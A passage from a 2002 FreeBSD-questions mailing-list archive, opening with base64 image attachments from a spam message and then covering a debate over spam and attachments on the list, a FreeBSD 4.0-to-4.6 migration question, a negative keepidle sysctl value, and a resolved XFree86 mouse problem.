/wAL+6+TX34X918mozn9s+lTl+sfFVMiTwT3jWtt54Ld41b/AIX918mnwr7p5NTnP7cnSoy25w8V V7XTru8YKiEBgSo7pwOXipxeJ9dJu4Prasun9mLW3KyT9I6nNk2EcGXJJIy9JH8xLf0c+/qUsvYt wPYcm4xOG6wy487kV0UqSSYtwkA/tTACNt5CRfqsURUUIgCooAVQMAAOSqrWVKVlT0pSlCEpSlCE pSlCF//Z ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="=?iso-8859-1?Q?Fondo_de_D=EDa_luminoso.jpg?=" Content-Transfer-Encoding: base64 Content-ID: <002101c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEASABIAAD/7QVoUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAASAAAAAEA AQBIAAAAAQABOEJJTQPzAAAAAAAIAAAAAAAAAAA4QklNBAoAAAAAAAEAADhCSU0nEAAAAAAACgAB AAAAAAAAAAI4QklNA/UAAAAAAEgAL2ZmAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEA MgAAAAEAWgAAAAYAAAAAAAEANQAAAAEALQAAAAYAAAAAAAE4QklNA/gAAAAAAHAAAP////////// //////////////////8D6AAAAAD/////////////////////////////A+gAAAAA//////////// /////////////////wPoAAAAAP////////////////////////////8D6AAAOEJJTQQIAAAAAAAQ AAAAAQAAAkAAAAJAAAAAADhCSU0ECQAAAAAD9wAAAAEAAACAAAAAgAAAAYAAAMAAAAAD2wAYAAH/ 2P/gABBKRklGAAECAQBIAEgAAP/+ACdGaWxlIHdyaXR0ZW4gYnkgQWRvYmUgUGhvdG9zaG9wqCA0 LjAA/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwM DAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwM DAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgAgACAAwEiAAIRAQMR Af/dAAQACP/EAT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAA AQACAwQFBgcICQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVS wWIzNHKC0UMHJZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSl tcXV5fVWZnaGlqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFR YXEiEwUygZEUobFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOE w9N14/NGlKSFtJXE1OT0pbXF1eX1VmZ2hpamtsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A 9LSS7JlWLMolMkkmpXSTpIqUnCinCQQySTSknWilJkpSQtKxSlJJBKk6ZOkFP//Q9LlJMnVZmVCY qRUUCpSRKUpkErSpBRhOkClkCkmCcJ1rVQmUk0JKUm7p0kEqSTSkUrU//9H0kKQUU8qoCzlclRTy opEqC6SSSSVwlokkihScJAJwEgEKCRTpiE6lLJJJkFLJJJJq5//S9JTJ0ypthcJJkpSUukklqipS kmhSARAQVBJOE6ctWCdJIooYlRKkSok6ppXBSRSCcodEv//T9JSSThVGwxITKZTQhSrUE6QCdOCC uEkySKF5Ugop0QgrpikSokokqCxTKSaEwrlBP8Eyfskh/9T0lSUSkCVUZ2SSYKSKFkkkgipSSdMU lLpFMmJStVLykmlOhaVJJAJ4RQslKSZBL//V9JTwkkqjOunUU4KchSQTpJKWJSTEppQtNLkpkk8I bqUAnSTIqZJSmSRQsmUlEoFIf//W9KCSSdVWdZIJQkkplKZNKSNopc6qMKSZBKycFOkB4pUq1JJ4 CUI0i1kydMUClUpkkkEv/9kAOEJJTQQGAAAAAAAHAAMAAAABAQD//gAnRmlsZSB3cml0dGVuIGJ5 IEFkb2JlIFBob3Rvc2hvcKggNC4wAP/uAA5BZG9iZQBkAAAAAAH/2wCEAAoHBwcIBwoICAoPCggK DxINCgoNEhQQEBIQEBQRDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwBCwwMFRMV IhgYIhQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM DP/AABEIASwBLAMBEQACEQEDEQH/3QAEACb/xAGiAAAABwEBAQEBAAAAAAAAAAAEBQMCBgEABwgJ CgsBAAICAwEBAQEBAAAAAAAAAAEAAgMEBQYHCAkKCxAAAgEDAwIEAgYHAwQCBgJzAQIDEQQABSES MUFRBhNhInGBFDKRoQcVsUIjwVLR4TMWYvAkcoLxJUM0U5KismNzwjVEJ5OjszYXVGR0w9LiCCaD CQoYGYSURUaktFbTVSga8uPzxNTk9GV1hZWltcXV5fVmdoaWprbG1ub2N0dXZ3eHl6e3x9fn9zhI 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 ------=_NextPart_000_0022_01C217D4.8D47E540-- _______________________________________________ Publicidad mailing list Publicidad@sonimag.net http://thor.sonimag.net/mailman/listinfo/publicidad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 5:14: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 9AD7337B401 for ; Sun, 23 Jun 2002 05:13:48 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 05:13:47 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: Ruben de Groot Date: Sun, 23 Jun 2002 05:13:48 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG In-reply-to: <20020623131923.A42352@ei.bzerk.org> References: <20020623074218749.AAA684@empty1.ekahuna.com@pc02.ekahuna.com>; from pjklist@ekahuna.com on Sun, Jun 23, 2002 at 12:42:18AM -0700 X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623121347865.AAA672@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 13:19, Ruben de Groot boldly uttered: > On Sun, Jun 23, 2002 at 12:42:18AM -0700, Philip J. Koenig typed: > > > Date: Fri, 21 Jun 2002 15:50:55 +0200 > > > From: Ruben de Groot > > > From /etc/motd (what every newbee will read after the first successfull > > > installation): > > > > > > If you still have a question or problem, please take the output of > > > `uname -a', along with any relevant error messages, and email it > > > as a question to the questions@FreeBSD.org mailing list. > > > > > > I consider this an excellent service provided by FreeBSD. > > > > > > It may be an "excellent service" to some minority of FreeBSD users, > > but we all thought having open SMTP relays was an "excellent service" > > too, back in the innocent years before the explosion of spam. > > > > Already at least one new user that I saw gave up after one day of > > being on this list because of all the junk on it, and I also know > > that some users in certain parts of the world consider it to be a > > major problem to receive large parcels of junk - in many cases this > > costs them real money due to usage costs. > > But you don't have to be subscribed to the list to ask a question. If > your connection doesn't allow you to receive large amounts of email, > junk or not, you can just submit your question without subscribing, and > you will only receive answers from that thread. This is what I mean by > "excellent service", it's a lot like what you get from a commercial > support contract, only run entirely by volunteers who are on the lists. Let's put it this way: even Windoze mailing lists aren't as a rule setup to allow anyone in the world to post - newbies or not. If Windoze newbies are clueful enough to figure out how to join a list in order to post a question, why aren't our supposedly more clueful FreeBSD newbies? And what is the point of posing a question to the list without being there to read the answer? Is there some rule that everyone that answers a question on -questions has to cc: the original poster? What about those who don't feel like it, or forget? On Usenet, after many years of experience and refinement, people ended up in near- universal agreement that to post a message and then just ask people to email you the answer (because you're too lazy to read the group) is considered rude and bad form. I think if someone doesn't feel like joining the mail list, they should just post a message somewhere like comp.unix.bsd.freebsd.misc instead. (speaking of - is there such thing as a bidirectional Usenet gateway for any of these "official" groups? Personally, I almost universally prefer the Usenet format for many reasons, including the fact that it eliminates this "subscription" issue altogether, and because the client software is almost universally far superior, resulting in something much easier to navigate and participate in.) > > I am on at least 8 other mailing lists that allow user posting and > > FreeBSD-Questions is the ONLY one that I see this problem on! > > (including the other FreeBSD lists I subscribe to) > > I am also subscribed to several closed mailing lists, and they do have > less spam sent directly to the list (although even on the > freebsd-questions list this has never been more than about 5% of the > total volume in my experience). Yesterday or the day before I must have received at *least* 1-2MB of pure junk from freebsd-questions - 95% of 5-6 digests in a row were pure spam, viruses or antivirus auto-replies. > On the other hand, spammers do subscibe > to these mailing lists as well so as soon as I post a message to any of > these lists, the email address I used will be harvested and get spammed. > This amounts to the majority of spam I receive and has nothing to do > with the list being open or closed. That's a different issue, and not something I brought up. (personally I use a separate address for lists, and when it gets on too many spammer lists, I just retire it or use it as a spamtrap. Same for Usenet, etc.) > Also on these other lists I have seen members hit by virusses and > spamming the list with virus-infected emails, just like recently on > freebsd-questions. I have never seen it to the extent I have seen it here. > > Either there should be some virus-scanning mechanism deployed > > (something several of the lists I'm on do), something should be done > > about moderation (ie assign several people the ability to temporarily > > block traffic from certain senders) or the idea of allowing posting > > from anywhere should be reconsidered. > > I agree on all but your last option, for reasons I gave above. > The problem here I think is not what should be done, but what can be > done. For example I believe the list allready is moderated (sometimes > certain senders do get blocked), but as everything in FreeBSD this is a > volunteers effort, and noone probably has the time to monitor the list > 24x7 so the mechanism is far from watertight. If I am right and the > situation can be improved by having more people monitor the list, I > would be happy to spent some of my time helping out here. Thus my suggestion that others help out. You can't expect jmb to monitor every list 24x7 looking for junk to block. Imagine what slashdot would be like with a single moderator?!? > The other option you gave, scanning for virusses, should indeed be > considered. But installing a virus-scanning mechanism on an allready > heavy loaded server like hub.freebsd.org is not something you do > overnight. It is highly likely that it will require a hardware upgrade > just to handle the extra load from the virus scanning processes (I speak > from experience here) and who is going to pay for that? Well I am aware of that as well - and as one of the previous posters suggested, a simple solution to that problem is just to disallow file attachments of any kind. Many lists do this. Once again, I really really doubt there's any real need to allow file attachments. If its a config file it should just be put into the body of the message. People like myself who only subscribe to digests can't do much with these attachments anyway. (without aggravating effort, at least.) All a large file attachment does for people like me who only subscribe to the digest, is make it incredibly annoying to scroll through the digest looking for text to read. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 5:17:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp03.wxs.nl (smtp03.wxs.nl [195.121.6.37]) by hub.freebsd.org (Postfix) with ESMTP id 06F3037B401 for ; Sun, 23 Jun 2002 05:17:50 -0700 (PDT) Received: from cybertron.kruijff ([213.10.151.186]) by smtp03.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id GY5RHO01.LED; Sun, 23 Jun 2002 14:17:48 +0200 Date: Sun, 23 Jun 2002 14:18:37 +0200 From: Alex X-Mailer: The Bat! (v1.53d) Reply-To: freebsd-reply@akruijff.dds.nl X-Priority: 3 (Normal) Message-ID: <628414168.20020623141837@dds.nl> To: "tonix (Antonio Nati)" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Upgrading from 4.0 to 4.6 In-Reply-To: <5.1.1.6.0.20020621143524.00a71a08@pop.ufficiopostale.it> References: <5.1.1.6.0.20020621143524.00a71a08@pop.ufficiopostale.it> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dear tonix, Friday, June 21, 2002, 2:43:39 PM, you wrote: tAN> I've a FreeBSD box running fine with 4.0 and lots of applications, DB tAN> server, WEB servers, (NO X-server), etc.., all working extremely nicely. tAN> Probably, I'll have to expand to another box with RAID disks, and much tAN> probably, I should switch to FreeBSD 4.6. tAN> I cant rebuild all, too many applications... tAN> May anyone suggest if this plan may works, or suggest me different paths? tAN> A) Backup old system (megatar.tar.Z) tAN> B) Create new system, with minimal FreeBSD 4.0 installation, creation of tAN> all disks, etc... tAN> C) Restore of megatar.tar.z in new system You will at lease use a image tool not an archive tool. Check out dd or ghost (windows). And it would only work if you got the same kind of hardware on the system. (I have had no experience with dd.) Since its new hardware you have nothing to lose. If it works you have the same system on the new hardware. Do a make world just in case there are minor problems. tAN> D) Binary upgrade of new system to 4.6 tAN> E) Recompile and install of new kernel with new features enabled tAN> (multi-processor, etc). tAN> F) Recompile and install of additional packages (where possible). tAN> I would like to avoid to install upgrades of packages. I already upgraded tAN> where there were security problems, and I would like to avoid to make an tAN> uncontrolled salad just now. tAN> Thanks for any advice. tAN> Tonino tAN> P.S. Please reply cc to me also, I'm not subscribed to this mailing list. -- Best regards, Alex The FreeBSD handbook www.freebsd.org/handbook The mailing lists http://www.freebsd.org/support.html#mailing-list How to get best results from the FreeBSD- questions mailing list http://www.freebsd.org/doc/en_US.ISO8859-1/articles/freebsd-questions/index.html Alternative: http://www.lemis.com/questions.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 5:25:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 3292937B412 for ; Sun, 23 Jun 2002 05:25:20 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 05:25:18 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 05:25:19 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com Cc: Ruben de Groot In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623122518970.AAA709@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Sun, 23 Jun 2002 13:19:23 +0200 > From: Ruben de Groot > On Sun, Jun 23, 2002 at 12:42:18AM -0700, Philip J. Koenig typed: > > > From /etc/motd (what every newbee will read after the first > > > successfull installation): > > > > > > If you still have a question or problem, please take the output of > > > `uname -a', along with any relevant error messages, and email it as a > > > question to the questions@FreeBSD.org mailing list. > > > > > > I consider this an excellent service provided by FreeBSD. > > > > > > It may be an "excellent service" to some minority of FreeBSD users, but > > we all thought having open SMTP relays was an "excellent service" too, > > back in the innocent years before the explosion of spam. > > > > Already at least one new user that I saw gave up after one day of > > being on this list because of all the junk on it, and I also know > > that some users in certain parts of the world consider it to be a > > major problem to receive large parcels of junk - in many cases this > > costs them real money due to usage costs. In the ultimate irony (or perhaps more accurately, in the ultimate obviousness), the message that immediately followed Ruben's in the last digest, and which took up fully 70% of the entire digest, was yet another spam, complete with a nice big file attachment. I have to laugh when people use the excuse that hub.freebsd.org is a really busy server to argue against cracking down on spam and junk in the lists - when in the last couple of days that same junk has resulted in several extra gigabytes of useless trash being sent all around the world to every member of this list through hub.freebsd.org. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 5:35:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seth.uct.kiev.ua (out.uct.kiev.ua [193.110.101.145]) by hub.freebsd.org (Postfix) with ESMTP id A1F3937B43D for ; Sun, 23 Jun 2002 05:33:22 -0700 (PDT) Received: from gw.uct.kiev.ua (gw.uct.kiev.ua [193.110.100.5]) by seth.uct.kiev.ua (8.12.4/8.12.2) with ESMTP id g5NCXBAw006571 for ; Sun, 23 Jun 2002 15:33:11 +0300 (EEST) (envelope-from sig@uct.kiev.ua) Received: from izida (izida.kiev.ua [193.110.100.3]) by gw.uct.kiev.ua (None/8.11.6) with ESMTP id g5NCXBJ05944 for ; Sun, 23 Jun 2002 15:33:11 +0300 (EEST) Date: Sun, 23 Jun 2002 15:33:16 +0300 From: sig X-Mailer: The Bat! (v1.60h) Personal Reply-To: sig Organization: UCT X-Priority: 3 (Normal) Message-ID: <14214272753.20020623153316@uct.kiev.ua> To: freebsd-questions@FreeBSD.ORG Subject: net.inet.tcp.keepidle MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG FreeBSD 4.5-RELEASE-p6 sysctl net.inet.tcp.keepidle: -1389934 i found in descriptions, that default value must be 2 hours i.e. 72000 seconds. But why sysctl shows negative value?? Can it be, that timeout is stored in milliseconds (72000000) , but variable holding this value is a WORD instead a DWORD?? Or this just an incorrent sysctl output?? i tried to change the value: #sysctl net.inet.tcp.keepidle=7200000 net.inet.tcp.keepidle: -1389934 sysctl: net.inet.tcp.keepidle: Invalid argument ^^^ didnt works #sysctl net.inet.tcp.keepidle=7200 net.inet.tcp.keepidle: -1389934 -> 7200 ^^^ changed ok And finally, i want ask, can be this error (when keepidle<0) damage a system stability? Out server is hangs 2-3 times per week. And we can't find the cause. No errors in logs, no core dumps - nothing!!! Server just stops react to anything. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 6:46:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web10008.mail.yahoo.com (web10008.mail.yahoo.com [216.136.130.44]) by hub.freebsd.org (Postfix) with SMTP id BC63937B400 for ; Sun, 23 Jun 2002 06:46:46 -0700 (PDT) Message-ID: <20020623134646.77852.qmail@web10008.mail.yahoo.com> Received: from [24.206.136.245] by web10008.mail.yahoo.com via HTTP; Sun, 23 Jun 2002 06:46:46 PDT Date: Sun, 23 Jun 2002 06:46:46 -0700 (PDT) From: Ronnie Clark Reply-To: Ronj_clark@yahoo.com Subject: Re: Xfree 4.2.0 and this stupid mouse! To: freebsd-questions@FreeBSD.ORG In-Reply-To: <20020622094237.77ad71cd.nkinkade@dsl-only.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Good Sunday Morning! Thanks to all who have helped. I finally got this thing working. I had to manually hack the XF86Config file and set it to auto, as well as edit my rc.conf file and set moused_enable to "YES". Now my hair can begin to grow back. RC --- Nathan Kinkade wrote: > On Sat, 22 Jun 2002 05:54:43 -0700 (PDT) > Ronnie Clark wrote: > > > Hello all again... > > > > Well, I have tried all of the suggestions, but > nothing > > has seemed to work. I have disabled the mouse > daemon > > by editing /etc/rc.conf and setting > > moused_enable="NO". (I hope this is right) I have > then > > edited /etc/X11/XF86Config (by hand the last few > > times) and changed my 